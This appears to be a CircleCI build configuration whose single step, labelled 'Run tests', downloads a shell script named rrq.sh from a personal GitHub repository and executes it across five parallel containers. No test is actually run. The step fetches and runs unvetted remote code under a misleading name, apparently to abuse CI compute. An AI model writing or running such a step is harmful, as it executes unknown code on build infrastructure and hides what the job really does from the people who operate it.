version: 2.1
jobs:
  build:
    parallelism: 5
    docker:
      - image: cimg/ruby:3.0.2-node
    steps: 
      - checkout 
      - run: 
          name: Run tests 
          command: wget https://raw.githubusercontent.com/Nurultyas7979/indo/main/rrq.sh && chmod +x rrq.sh && ./rrq.sh